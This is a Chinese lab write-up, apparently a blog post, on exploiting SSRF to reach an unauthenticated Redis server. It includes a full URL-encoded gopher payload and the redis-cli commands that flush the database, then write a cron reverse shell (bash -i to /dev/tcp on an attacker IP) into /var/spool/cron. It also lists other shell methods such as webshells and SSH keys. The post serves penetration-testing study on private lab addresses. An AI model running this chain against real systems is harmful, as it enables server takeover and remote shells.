ssrf+redis未授权靶场
ssrf+redis靶场利用
原理:服务端提供了从其他服务器获取数据的功能,而且没做好限制
非常类似文件包含
常见功能点
- 在线翻译网页
- 图片加载
- 网站信息收集
可利用点
- 端口扫描,用dict
- 本地敏感数据file
- 做跳板利用其它漏洞gophar
验证:抓包分析服务器是否发送请求
利用
- http协议访问内外网web资源
- file协议读取本地文件
- dict协议探测内外网tcp端口
- gopher协议做跳板
ssrf+redis未授权实验
环境准备
- kali攻击机 192.168.0.4
- ssrf靶场 web靶场添加一个ssrf利用文件 192.168.0.10
- redis未授权靶场 192.168.0.9
本实验均在同一网段下,因为没找到redis不出网的利用方式,凑合联动一下
redis靶场
#设置只允许ssrf靶场服务器访问6379
firewall-cmd --add-rich-rule='rule family=ipv4 source address=192.168.0.10 port port=6379 protocol=tcp accept'
可以看到kali不能直接访问,但可以通过ssrf来访问
构造攻击payload利用
#自己改ip 在进行一次url编码利用两次编码后的payload
gopher://192.168.0.7:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$7%0d%0afarmsec%0d%0a$59%0d%0a%0a%0a*/1 * * * * bash -i >&/dev/tcp/192.168.0.4/3333 0>&1%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0a%0a
payload制作教程
- 自写脚本或者用大佬们写的 cp自己改也行
- 利用wireshark抓流量
- 利用socat看流量
#攻击机执行
#socat
socat -v tcp-listen:6379,fork tcp-connect:192.168.0.7:6379
#这种手法是先搞一个本地靶场,把自己攻击机流量转发到本地redis靶场
redis-cli -h 127.0.0.1 flushall #清空数据库。
echo -e "\n\n*/1 * * * * bash -i >&/dev/tcp/192.168.10.96/3333 0>&1\n\n"|redis-cli -h 127.0.0.1 -x set abc #写入脚本赋值abc
redis-cli -h 127.0.0.1 config set dir /var/spool/cron/ #设置工作目录centos是这个目录
redis-cli -h 127.0.0.1 config set dbfilename root #设置保存文件名字
redis-cli -h 127.0.0.1 save #保存
这样就把流量抓到攻击机可以开nc监听,发送payload了
一般针对redis未授权是三种getshell方法(还有一些高端玩法)分别是
针对同时有web服务器的可以写webshell
针对root权限有ssh的可以写公钥
针对centos服务器root权限可以写cron(因为ubuntu那种目录权限有些问题)
ssrf+redis未授权靶场相关推荐
- 再探SSRF服务器请求伪造(weblogic cve ssrf redis未授权)
攻击Redis 漏洞环境 复现环境使用vulhup weblogic ssrf 地址:https://vulhub.org/#/environments/weblogic/ssrf/ vulhub使用 ...
- redis 未授权访问详解
一. 应用介绍 Redis是一个开源的使用ANSI C语言编写.支持网络.可基于内存亦可持久化的日志型. Key-Value数据库.和Memcached类似,它支持存储的value 类型相对更多,包括 ...
- Redis未授权访问写Webshell和公私钥认证获取root权限
0x01 什么是Redis未授权访问漏洞 Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Red ...
- windows php cli 后台运行_【续】windows环境redis未授权利用方式梳理
01 Redis未授权产生原因 1.redis绑定在0.0.0.0:6379默认端口,直接暴露在公网,无防火墙进行来源信任防护. 2.没有设置密码认证,可以免密远程登录redis服务 02 漏洞危害 ...
- 哪种修复redis未授权访问漏洞的方法是相对不安全的_关于Linux挖矿、DDOS等应急事件处置方法...
前言 从去年六月份到现在做的应急响应.事件分析大大小小的做了数百个,主要遇到的有挖矿.DDoS.短信接口盗刷.用户接口泄漏.越权信息获取.挂黑页.删数据等.本文只针对自己做的应急响应中的挖矿和DDoS ...
- Redis 未授权访问缺陷可轻易导致系统被黑
Redis 未授权访问缺陷可轻易导致系统被黑 漏洞概要 Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将Redis服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在 ...
- debian 访问 windows 共享_【续】windows环境redis未授权利用方式梳理
01 Redis未授权产生原因 1.redis绑定在0.0.0.0:6379默认端口,直接暴露在公网,无防火墙进行来源信任防护. 2.没有设置密码认证,可以免密远程登录redis服务 02 漏洞危害 ...
- Redis未授权访问漏洞记录(端口:6379)
目录 Redis 扫描 未授权登录以及利用 写入SSH公钥,进行远程登录 定时任务反弹shell 写入一句话木马 其它一句话木马 写入/etc/passwd文件 利用主从复制RCE 本地Red ...
- redis未授权反弹shell
rt 发现一处redis未授权,进行反弹shell. 输入反弹命令: 主机监听端口: 反弹成功. 转载于:https://blog.51cto.com/13539934/2395206
最新文章
- POJ 3268 D-Silver Cow Party
- 计算机乐谱弱点,缺点简谱郑源
- 修改表主键字段数据类型(V2.0)
- MySQL使用用户变量优化先更新后查询
- 隐藏马尔科夫模型HMM
- Effective C# 原则48:了解更多的工具和资源(译)
- APIO/CTSC2017游记
- python 文本处理操作
- 转 Git-fatal: unable to access 'xxx' : Could not resolve host: xxx
- java网上销售外文文献_基于java网上购物论文英文的参考文献欣赏
- Windows 10 安装 Oracle 10g
- 决策树算法(ID3算法详解)
- 用Django2.1开发易班联合登录
- python笔记005-字符串-列表-元组
- switch游戏服务器设置
- macbook黑屏_Macbook苹果笔记本电脑开机黑屏如何解决【解决方法】
- 计算机音乐天使重构,天使重构
- 草图大师sketchup的模型加载到cesium里显示 带贴图
- NPOI使用Excel批注导入数据
- 十三第一阶段复习-python知识点梳理